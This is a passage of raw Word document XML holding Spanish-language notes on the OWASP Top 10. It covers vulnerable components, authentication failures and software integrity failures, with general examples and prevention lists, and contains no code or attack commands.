      <w:r w:rsidRPr="00EB097A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="0056249C" w:rsidRPr="00EB097A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">eshabilitar entidades externas de </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB097A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r w:rsidR="00AF6C8A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0056249C" w:rsidRPr="00EB097A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">y procesamiento </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB097A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>DTD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3148DF" w14:textId="77777777" w:rsidR="00EB097A" w:rsidRDefault="00816078" w:rsidP="00EB097A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB097A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="0056249C" w:rsidRPr="00EB097A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ista blanca</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB097A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> (implementación de entrada positiva)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387CC1AC" w14:textId="112FCDC7" w:rsidR="00EB097A" w:rsidRDefault="00816078" w:rsidP="00EB097A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB097A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="0069318F" w:rsidRPr="00EB097A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ntornos asegurados, actualizados, escaneos y auditorias regulares.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718AB97C" w14:textId="77777777" w:rsidR="00EB097A" w:rsidRDefault="00EB097A" w:rsidP="00EB097A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64E97F05" w14:textId="27AEA207" w:rsidR="0069318F" w:rsidRPr="00EB097A" w:rsidRDefault="0069318F" w:rsidP="00EB097A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB097A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">A06 – Componentes </w:t>
      </w:r>
      <w:r w:rsidR="00365A38" w:rsidRPr="00EB097A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB097A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">ulnerables y </w:t>
      </w:r>
      <w:r w:rsidR="00365A38" w:rsidRPr="00EB097A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB097A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>esactualizados:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C28292" w14:textId="2E986B54" w:rsidR="00365A38" w:rsidRDefault="00365A38" w:rsidP="00EB097A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Librerías</w:t>
      </w:r>
      <w:r w:rsidR="0069318F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0069318F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>frameworks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0069318F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> y otros </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>módulos</w:t>
      </w:r>
      <w:r w:rsidR="0069318F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> de software, son ejecutados con privilegios completos. Si un componente es explotado, podría darse lugar a un ataque.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4253A920" w14:textId="74EB7606" w:rsidR="0069318F" w:rsidRPr="00EB097A" w:rsidRDefault="0069318F" w:rsidP="00EB097A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00365A38">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Apache CXF Authentication </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00365A38">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Bypass</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00365A38">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidRPr="00365A38">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">l atacante puede invocar cualquier web services gracias a la falla </w:t>
      </w:r>
      <w:r w:rsidR="00365A38">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">de </w:t>
      </w:r>
      <w:r w:rsidRPr="00365A38">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>un bloque de identificación</w:t>
      </w:r>
      <w:r w:rsidR="00365A38">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> hecho por el proveedor</w:t>
      </w:r>
      <w:r w:rsidRPr="00365A38">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00EB097A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00365A38">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00365A38">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Spring Remote Code Execution</w:t>
      </w:r>
      <w:r w:rsidR="00365A38">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00365A38">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Al abusar de la implantación de “Expression Language” permitía a los atacantes la ejecución de código arbitrario.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B081BD1" w14:textId="77777777" w:rsidR="00EB097A" w:rsidRDefault="0069318F" w:rsidP="00EB097A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00365A38">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Dispositivos de internet de las cosas</w:t>
      </w:r>
      <w:r w:rsidR="00365A38" w:rsidRPr="00365A38">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00365A38" w:rsidRPr="00365A38">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>IoT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00365A38" w:rsidRPr="00365A38">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00365A38">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>No son actualizados o es muy difícil.</w:t>
      </w:r>
      <w:r w:rsidRPr="0069318F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="16299DBF" w14:textId="77777777" w:rsidR="00EB097A" w:rsidRDefault="0069318F" w:rsidP="00EB097A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB097A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Prevención</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36ABBCFA" w14:textId="77777777" w:rsidR="00EB097A" w:rsidRPr="00EB097A" w:rsidRDefault="0034038B" w:rsidP="00EB097A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB097A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="0069318F" w:rsidRPr="00EB097A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>dentificar todos los componentes y la versión que están ocupando</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD553C6" w14:textId="77777777" w:rsidR="00EB097A" w:rsidRPr="00EB097A" w:rsidRDefault="0034038B" w:rsidP="00EB097A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB097A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidR="0069318F" w:rsidRPr="00EB097A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>evisar la seguridad del componente en base de datos públicas</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB097A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, l</w:t>
      </w:r>
      <w:r w:rsidR="0069318F" w:rsidRPr="00EB097A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ista de correos del proyecto y lista de correo de seguridad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76366AC9" w14:textId="4FBE71FF" w:rsidR="0034038B" w:rsidRPr="00EB097A" w:rsidRDefault="0034038B" w:rsidP="0034038B">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB097A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidR="0069318F" w:rsidRPr="00EB097A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>egular el uso de componentes, teste</w:t>
      </w:r>
      <w:r w:rsidR="00DB2687">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidR="0069318F" w:rsidRPr="00EB097A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> de seguridad y licencias, capas de seguridad alrededor del componente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38586507" w14:textId="77777777" w:rsidR="00EB097A" w:rsidRPr="00EB097A" w:rsidRDefault="00EB097A" w:rsidP="00EB097A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1800"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FAACFAE" w14:textId="4E43BFAA" w:rsidR="0069657D" w:rsidRPr="00EB097A" w:rsidRDefault="0069318F" w:rsidP="00EB097A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB097A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">A07 </w:t>
      </w:r>
      <w:r w:rsidR="0034038B" w:rsidRPr="00EB097A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>– Fallas de Identificación y Autenticación</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB097A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4C7F78" w14:textId="181CC4E9" w:rsidR="0069657D" w:rsidRDefault="0069657D" w:rsidP="00EB097A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Las funciones de las aplicaciones relacionadas con la autenticación y gestión de sesiones son implementadas incorrectamente, permitiendo ser vulneradas. Esto permite obtener información sensible o asumir identidades de otros usuarios. La mayoría de los ataques a autenticación suceden por no tener doble verificación. El relleno de credenciales, lista de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>contraseñas conocidas, el tiempo de sesión de aplicación, son las posibles fallas que usaría un atacante.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6868203A" w14:textId="77777777" w:rsidR="005A007D" w:rsidRDefault="00EB097A" w:rsidP="005A007D">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Ejemplo 1: </w:t>
      </w:r>
      <w:r w:rsidR="005A007D">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Relleno de credenciales, uso de listas de contraseñas conocidas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642A7724" w14:textId="77777777" w:rsidR="005A007D" w:rsidRDefault="005A007D" w:rsidP="005A007D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Ejemplo 2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Ataques de autenticación debidos al uso de contraseñas como único factor. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582DB454" w14:textId="0B412EC0" w:rsidR="00EB097A" w:rsidRPr="005A007D" w:rsidRDefault="005A007D" w:rsidP="005A007D">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Ejemplo 3: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Mala configuración en los tiempos de vida de las sesiones en la aplicación. El usuario cierra el sitio web en vez de usar el “logout”. </w:t>
      </w:r>
      <w:r w:rsidR="00EB097A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E224925" w14:textId="77777777" w:rsidR="005A007D" w:rsidRDefault="0069657D" w:rsidP="005A007D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A007D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Prevención</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31174826" w14:textId="77777777" w:rsidR="005A007D" w:rsidRPr="005A007D" w:rsidRDefault="0034038B" w:rsidP="005A007D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A007D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="0069657D" w:rsidRPr="005A007D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>isponer de un robusto y único conjunto de controles de autenticación y gestión de sesiones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A866C8" w14:textId="77777777" w:rsidR="005A007D" w:rsidRPr="005A007D" w:rsidRDefault="0034038B" w:rsidP="005A007D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A007D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="0069657D" w:rsidRPr="005A007D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>vitar vulnerabilidades XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACF62DE" w14:textId="77777777" w:rsidR="005A007D" w:rsidRPr="005A007D" w:rsidRDefault="0034038B" w:rsidP="005A007D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A007D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="0069657D" w:rsidRPr="005A007D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>utenticación multifactorial</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A04D4DC" w14:textId="77777777" w:rsidR="005A007D" w:rsidRPr="005A007D" w:rsidRDefault="0034038B" w:rsidP="005A007D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A007D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="0069657D" w:rsidRPr="005A007D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ontrol de contraseñas débiles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C2C7CE" w14:textId="6DA625CB" w:rsidR="0069657D" w:rsidRPr="005A007D" w:rsidRDefault="0034038B" w:rsidP="005A007D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A007D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="0069657D" w:rsidRPr="005A007D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>imite o incremento en intentos fallidos de inicio de sesión, rotación y complejidad de contraseña</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5019FD2B" w14:textId="77777777" w:rsidR="005A007D" w:rsidRPr="005A007D" w:rsidRDefault="005A007D" w:rsidP="005A007D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1800"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7677FFED" w14:textId="4A2B6CDB" w:rsidR="0069657D" w:rsidRPr="005A007D" w:rsidRDefault="0069657D" w:rsidP="005A007D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A007D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">A08 – </w:t>
      </w:r>
      <w:r w:rsidR="0034038B" w:rsidRPr="005A007D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Fallas en el Software y en la Integridad de los Datos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561A12F0" w14:textId="77777777" w:rsidR="005A007D" w:rsidRDefault="005A007D" w:rsidP="005A007D">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidR="00A165BF">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">elacionados con código e infraestructura no protegidos contra alteraciones. Se incluye la dependencia en plugins, bibliotecas o módulos fuente, repositorios o redes de entrega de contenidos no confiables, actualizaciones no confiables. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BD8104" w14:textId="3CC0E4BE" w:rsidR="005A007D" w:rsidRDefault="005A007D" w:rsidP="005A007D">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A007D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Ejemplo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
      <w:r w:rsidRPr="005A007D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="005A007D">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> A</w:t>
      </w:r>
      <w:r w:rsidR="00A165BF" w:rsidRPr="005A007D">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">ctualizaciones no firmadas, los dispositivos no verifican </w:t>
      </w:r>
      <w:r w:rsidRPr="005A007D">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>la firma de sus actualizaciones de firmware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CACFDA" w14:textId="77777777" w:rsidR="005A007D" w:rsidRDefault="005A007D" w:rsidP="005A007D">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Ejemplo 2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Actualización maliciosa de SolarWinds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A187A2D" w14:textId="155CC653" w:rsidR="00A165BF" w:rsidRPr="005A007D" w:rsidRDefault="00A165BF" w:rsidP="005A007D">
      <w:pPr>
